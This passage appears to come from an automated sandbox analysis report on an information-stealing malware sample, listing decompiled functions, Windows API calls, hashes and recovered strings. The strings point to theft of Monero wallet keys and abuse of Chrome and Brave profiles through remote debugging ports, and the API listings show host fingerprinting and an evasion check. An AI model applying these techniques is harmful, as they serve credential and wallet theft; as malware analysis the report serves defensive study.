                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 628f0ff5133519215dd35aa3ef9f05a35da5fa626611d932a976d0e3dd73da58
                            • Instruction ID: 8769dc53a02a991ec3f38ff3087651b1c1b3dc93774a4225c26414465cb42c3a
                            • Opcode Fuzzy Hash: 628f0ff5133519215dd35aa3ef9f05a35da5fa626611d932a976d0e3dd73da58
                            • Instruction Fuzzy Hash: AE213EB1D00209ABDF14DFA5EC46ADE7BB5FB44321F108625F925B72D0EB706A09CB91
                            Function 00E55440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E462D0: InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                              • Part of subcall function 00E462D0: StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                              • Part of subcall function 00E462D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                              • Part of subcall function 00E462D0: HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
                              • Part of subcall function 00E462D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                              • Part of subcall function 00E462D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55478
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 4153b8d810f8d168ff976277ff8acbd146d311a16986e74fe780f40b74016c64
                            • Instruction ID: ee903de220cf2f343e99f84200b549bfa9587fd2dbff6004ace4b7c6192304f2
                            • Opcode Fuzzy Hash: 4153b8d810f8d168ff976277ff8acbd146d311a16986e74fe780f40b74016c64
                            • Instruction Fuzzy Hash: AA112130900108ABCB14FF64D962AED77B99F10341F445A68FD1A67492EF30AB0CC791
                            Function 00E57A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0ea4734d69df8b81c6aecef430886f7c56b4fff7ee4d7ace3a3245124e72a3c7
                            • Instruction ID: 9833c11ddeb4f9e99b0857061e73f754a977b643daa21a92af06c004a241a5cd
                            • Opcode Fuzzy Hash: 0ea4734d69df8b81c6aecef430886f7c56b4fff7ee4d7ace3a3245124e72a3c7
                            • Instruction Fuzzy Hash: F50162B1948249ABC714DF98D945FAFBBB8F704711F100629F955A23C0D7B45A44C7A1
                            Function 00E41110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                            • ExitProcess.KERNEL32 ref: 00E41143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 1ec7925c184315aab8073bee9371d7e068cc19c9fa232b6a6e3f702a138ab8f3
                            • Instruction ID: 3647b983e9a35b6a2240171dfc084328714a5e288af6858fdcf51f7dcc9eb333
                            • Opcode Fuzzy Hash: 1ec7925c184315aab8073bee9371d7e068cc19c9fa232b6a6e3f702a138ab8f3
                            • Instruction Fuzzy Hash: 6AE0CD7098530CFBEB24AB90ED0EB4CB67C9B04B05F100094F708766C0C6F425C04759
                            Function 00E410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E410B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E410F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: e3b0204290ecf936c9f73a51bd31f1dca12a80817c79777f1bbdfcde2b4520ef
                            • Instruction ID: d4ff81f6ab74e3de7c0e23f3e4ef6516028b5ec7e3e09d2fb73470f894aa2e78
                            • Opcode Fuzzy Hash: e3b0204290ecf936c9f73a51bd31f1dca12a80817c79777f1bbdfcde2b4520ef
                            • Instruction Fuzzy Hash: 9EF0E2B1641208BBEB289AA4AC59FAFF7DCE705B05F301858F901F3280D5719E408BA0
                            Function 00E41190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E57A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                              • Part of subcall function 00E57A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                              • Part of subcall function 00E57A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                              • Part of subcall function 00E579E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                              • Part of subcall function 00E579E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                              • Part of subcall function 00E579E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
                            • ExitProcess.KERNEL32 ref: 00E411C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: a13a8be583bae73cd0b1ebeb3a44abf8271e07277cb3fadd1c17c1c68d6bf5a4
                            • Instruction ID: 1e96e6cf159737d7f95fb18636ea85e7045f8be0cb7495ddfdd479a602174219
                            • Opcode Fuzzy Hash: a13a8be583bae73cd0b1ebeb3a44abf8271e07277cb3fadd1c17c1c68d6bf5a4
                            • Instruction Fuzzy Hash: AFE0E2B990430253CA2473B4BE16B2A72CC5B1424FF002864FE18B2246FA25E8988666

                            Non-executed Functions

                            Function 00E4BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00E60B32,00E60B2F,00000000,?,?,?,00E61450,00E60B2E), ref: 00E4BEC5
                            • StrCmpCA.SHLWAPI(?,00E61454), ref: 00E4BF33
                            • StrCmpCA.SHLWAPI(?,00E61458), ref: 00E4BF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4C8A9
                            • FindClose.KERNEL32(000000FF), ref: 00E4C8BB
                            Strings
                            • Preferences, xrefs: 00E4C104
                            • Brave, xrefs: 00E4C0E8
                            • \Brave\Preferences, xrefs: 00E4C1C1
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C3B2
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C495
                            • Google Chrome, xrefs: 00E4C6F8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C534
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
                            • Opcode ID: 40dd06b0e41c15979087f81173fcfe5e4dfb1a082678ce70228ce077aad1ffef
                            • Instruction ID: e9107f4ff139825f5f8290df424762eb2748b5d936e3902be123f587a4c65ca7
                            • Opcode Fuzzy Hash: 40dd06b0e41c15979087f81173fcfe5e4dfb1a082678ce70228ce077aad1ffef
                            • Instruction Fuzzy Hash: 145243725101089BCB54FB60DD96EEE73BDAF54305F445AA8F90A76181EE309B4CCFA2
                            Function 00E53B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00E53B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E53B33
                            • lstrcat.KERNEL32(?,?), ref: 00E53B85
                            • StrCmpCA.SHLWAPI(?,00E60F58), ref: 00E53B97
                            • StrCmpCA.SHLWAPI(?,00E60F5C), ref: 00E53BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E53EB7
                            • FindClose.KERNEL32(000000FF), ref: 00E53ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 94c77efcec145c8029e82a38c1887dfb23a219cd4a594d2e2648694b27ce8f22
                            • Instruction ID: c3ff9324395e5a43c9824b67b651a4216ed77c03ac17f322d1fb2e85f3e90bad
                            • Opcode Fuzzy Hash: 94c77efcec145c8029e82a38c1887dfb23a219cd4a594d2e2648694b27ce8f22
                            • Instruction Fuzzy Hash: B3A13471A402189BDB34DF64DD85FEEB3B9BB44301F044998F91DA6185EB709B88CF61
                            Function 00E54B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00E54B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                            • StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                            • StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                            • FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 8d5081b4298b20826da89c3655b76899388c60d9aa4e8a9c1053573cc441170a
                            • Instruction ID: 62642bb20cb69d3ec419a1ef60478983a8310101a2f1207190561df719ee699e
                            • Opcode Fuzzy Hash: 8d5081b4298b20826da89c3655b76899388c60d9aa4e8a9c1053573cc441170a
                            • Instruction Fuzzy Hash: 876149B1500218ABCB34EBA0DD45FEAB37CAB48705F004598F519A61C5EB74ABC8CF91
                            Function 00E547C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E547D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E547D7
                            • wsprintfA.USER32 ref: 00E547F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E5480D
                            • StrCmpCA.SHLWAPI(?,00E60FAC), ref: 00E5483B
                            • StrCmpCA.SHLWAPI(?,00E60FB0), ref: 00E54851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E548DB
                            • FindClose.KERNEL32(000000FF), ref: 00E548F0
                            • lstrcat.KERNEL32(?,009CF320), ref: 00E54915
                            • lstrcat.KERNEL32(?,009CE658), ref: 00E54928
                            • lstrlen.KERNEL32(?), ref: 00E54935
                            • lstrlen.KERNEL32(?), ref: 00E54946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
